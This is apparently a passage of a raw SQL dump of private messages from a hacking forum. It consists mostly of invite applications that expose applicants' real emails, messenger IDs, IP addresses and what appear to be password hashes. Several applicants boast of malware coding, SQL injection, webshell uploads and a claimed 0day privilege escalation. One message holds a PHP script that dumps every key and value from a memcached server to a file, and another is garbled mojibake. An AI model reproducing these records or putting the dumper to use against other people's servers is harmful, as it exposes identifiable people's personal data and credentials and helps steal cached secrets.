Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1458, 1318, 0, 'Invite', 2, 'New invite', 1407517680, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1459, 1319, 0, 'Invite', 2, 'New invite', 1407517693, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1460, 1320, 0, 'Invite', 2, 'New invite', 1407517746, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1461, 1321, 0, 'Invite', 2, 'New invite', 1407517755, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1462, 1322, 0, 'Invite', 2, 'New invite', 1407518217, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1420, 1234, 1369, 'w0rm', 1, '', 1407476078, 'ÿрøúрõÿøû ÿþøÑÂú ÿþ ÑÂûøтыü ñô ÿрø ÿþôðчõ ÷ðÑÂòúø.\r\n\r\nâðú тõÿõрь òыóÃȄÂôøт рõ÷уûьтðт ÿþôðýýþù ÷ðÑÂòúø c w0rm.in\r\n\r\n[URL=http://hostingkartinok.com/show-image.php?id=77b35fc47b6053c9335bf9f4f6b76696][IMG]http://s7.hostingkartinok.com/uploads/thumbs/2014/08/77b35fc47b6053c9335bf9f4f6b76696.png[/IMG][/URL]', 1, 0, '', 0, 1, 0, 0, 0), (1421, 1281, 0, 'Invite', 2, 'New invite', 1407478239, '[b]Name[/b]: karp\n [b]ICQ/Jabber[/b]: 661615739\n [b]e-mail[/b]: pkarepin@mail.ru\n [b]Info[/b]: Hi!\r\n\r\n1. SQL/XSS/CSRF/PHPinj and etc vuln.\r\n\r\n2. PL:PHP,python.\n \n [b]Mult[/b]: \n [b]Ip[/b]: 37.235.53.148\n [b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n [b]Referer[/b]: http://www.w0rm.in/index.php?site=joinus\n \n \n Search results:\n \n [b]Name[/b]\n [php]\n genadiikarpenya : genadii_karpenya@mail.ru : 89.178.191.19 : 4f68071251dc320ff7cb4957706281eb\n [/php]\n [b]E-Mail[/b]\n [php]\n : : : \n [/php]\n [b]IP[/b]\n [php]\n : : : \n [/php]\n -------------------------------', 1, 0, '', 0, 1, 0, 0, 0), (1474, 1333, 0, 'Invite', 2, '{$name}', 1407650671, '[SIZE=\'4\'][COLOR=\'Sienna\']methamphetamine[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: loco@jabber.se\n[b]e-mail[/b]: mrx80@gmx.com\n[b]Info[/b]: system hijack-ing passionate, meth lover, from time to time digital products seller, post forum.antichat.ru registered - user remember - password or email for registration forgotten.\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 174.143.244.15\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1467, 1327, 0, 'Invite', 2, 'New invite', 1407520443, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email2222222\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: 50.7.210.37\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1472, 1331, 0, 'Invite', 2, '{$name}', 1407631652, '[SIZE=\'4\'][COLOR=\'Sienna\']mjrod5[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: dn44@jodo.im\n[b]e-mail[/b]: dasdasz3@yandex.com\n[b]Info[/b]: Experience in coding in C++,ASM,delphi malware related projects. I can code in js/php.\r\nI have experience in web application security, SQLi (waf bypassing), advanced exploitation of xss,xxe,lfi,rfi,csrf,ssrf.\r\nhttp://www.ic0de.org/member.php?13265-mjrod5\r\nhttps://www.opensc.ws/members/mjrod5.html\r\nhttps://exploit.in/forum/index.php?showuser=49667\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 188.138.9.49\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mjrod5.deviantart.com | mjrod5.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1473, 1332, 0, 'Invite', 2, '{$name}', 1407645723, '[SIZE=\'4\'][COLOR=\'Sienna\']LeNo[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: l3n0@darkode.com\n[b]e-mail[/b]: l3n0@msn.com\n[b]Info[/b]: I m darkode Mod.\r\nSkills : hacking / reversing / malware\r\nrecent hack jabber servers , shodan, porn network many etc that i can show you on jabber in person.\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.199.193.178\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://leno.lv | leno.lv \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1477, 1336, 0, 'syslink', 13, 'memache-dumper', 1407662078, '[PHP]#!/usr/bin/env php\r\n\'.PHP_EOL;\r\n exit;\r\n}\r\n\r\n$memcache = new Memcache;\r\n$memcache->connect($argv[1]);\r\n\r\n$slabs = $memcache->getExtendedStats(\'slabs\');\r\n$items = $memcache->getExtendedStats(\'items\');\r\n\r\n$data = array();\r\n\r\nforeach ($slabs as $server => $server_slabs) {\r\n\r\n foreach ($server_slabs as $slab_id => $slab_metadata) {\r\n\r\n if (is_int($slab_id)) {\r\n\r\n $cache_dump = $memcache->getExtendedStats(\'cachedump\', $slab_id);\r\n\r\n foreach ($cache_dump as $cache_server => $entries) {\r\n\r\n if ($entries !== false) {\r\n\r\n foreach ($entries as $key => $value) {\r\n\r\n $data[$key] = array(\r\n \'key\' => $key,\r\n \'server\' => $cache_server,\r\n \'slab_id\' => $slab_id,\r\n \'value\' => $memcache->get($key),\r\n \'age\' => $items[$cache_server][\'items\'][$slab_id][\'age\'],\r\n );\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\n$output = \'\';\r\n$output .= \'Memcached dump\';\r\n$output .= \'\';\r\n$output .= \'\';\r\n$output .= \'
IdCookieCheck
\" . ++$i . \"$cCheck
\';\r\n$output .= \'\';\r\n$output .= \'\';\r\n$output .= \'\';\r\n$output .= \'\';\r\n$output .= \'\';\r\n$output .= \'\';\r\n\r\nforeach ($data as $values) {\r\n\r\n $output .= \'\';\r\n $output .= \'\';\r\n $output .= \'\';\r\n $output .= \'\';\r\n $output .= \'\';\r\n $output .= \'\';\r\n}\r\n\r\n$output .= \'
KeySlabIDAgeValue
\'.$values[\'key\'].\'\'.$values[\'slab_id\'].\'\'.$values[\'age\'].\'
\'.var_export($values[\'value\'], true).\'
\';\r\n\r\nfile_put_contents(\'/tmp/memcached-dumper.html\', $output);[/PHP]', 1, 0, '', 0, 1, 0, 0, 0), (1478, 1337, 0, 'Invite', 2, '{$name}', 1407666743, '[SIZE=\'4\'][COLOR=\'Sienna\']charmander[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: thecharbok@gmail.com\n[b]e-mail[/b]: thecharbok@gmail.com\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1479, 1338, 0, 'Invite', 2, '{$name}', 1407679024, '[SIZE=\'4\'][COLOR=\'Sienna\']z0rx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 668757190\n[b]e-mail[/b]: b9n@hotmail.com\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.163.234.9\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://z0rx.wordpress.com | z0rx.wordpress.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1480, 1339, 0, 'Invite', 2, '{$name}', 1407680096, '[SIZE=\'4\'][COLOR=\'Sienna\']g0rx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: g0rx@jabbim.com\n[b]e-mail[/b]: bansolik@mail.com\n[b]Info[/b]: Good expereivnse in sql inj, lfi, rfi. Uploading webshells through sql inj. own 0day Win Ldap domain privilage excalation. 5 years of experience.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.3.146.112\n[*][b]real ip[/b]: 195.3.146.112\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://extratorrent.cc/profile/g0rx/ | http://extratorrent.cc/profile/g0rx/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1481, 1340, 0, 'Invite', 2, '{$name}', 1407693525, '[SIZE=\'4\'][COLOR=\'Sienna\']Kaimi[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: admin@kaimi.ru\n[b]e-mail[/b]: admin@kaimi.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://kaimi.org | kaimi.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1482, 1341, 0, 'Invite', 2, '{$name}', 1407694752, '[SIZE=\'4\'][COLOR=\'Sienna\']Bl4k3[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: Bl4ke1@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.43.32.187\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://bl4k3.tumblr.com | bl4k3.tumblr.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1483, 1342, 0, 'Invite', 2, '{$name}', 1407695253, '[SIZE=\'4\'][COLOR=\'Sienna\']mark[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: none\n[b]e-mail[/b]: linnomarkus@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.111.160.30\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Mark : mark4545@yandex.ru : 82.198.27.146 : f392281cb6f97d82b85f2bb652e52cad\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mark.ru | mark.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1484, 1343, 0, 'Invite', 2, '{$name}', 1407698884, '[SIZE=\'4\'][COLOR=\'Sienna\']bidhata[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 65975621\n[b]e-mail[/b]: bidhata@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 202.142.71.93\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/kcbidhata | https://twitter.com/kcbidhata \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1485, 1344, 0, 'Invite', 2, '{$name}', 1407698955, '[SIZE=\'4\'][COLOR=\'Sienna\']th3hunt3r[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: th3hunt3r@jabber.ccc.de\n[b]e-mail[/b]: IBoyough3462@jourrapide.com\n[b]Info[/b]: Web applications developper and security enthusiast\r\nPHP, MySQL, Javascript\r\nC and C networking \r\nsoftware exploitation research\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.9.90.72\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.lostclanus.com/profile/131609 | http://www.lostclanus.com/profile/131609 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1486, 1345, 0, 'Invite', 2, '{$name}', 1407699098, '[SIZE=\'4\'][COLOR=\'Sienna\']phenyll[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 274404233\n[b]e-mail[/b]: worm@phenyll.com\n[b]Info[/b]: Developer in C, C++, C#, Java, Webbased languages for more than 5 years each\r\n\r\nI develop enterprise software in the field of online shops, insurances, financial analysis and business intelligence.\r\n\r\nMy solutions are in operation in companies with 50 to 500 employees. As I always have to consider security-related issues and am personally interested it\'d be gate great to profit from your database. I am not very active in online communities, though I can be found as phenyll on twitter, stackoverflow and so on. \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 217.253.252.238\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Linux; Android 4.4.2; SM-P605 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.131 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : 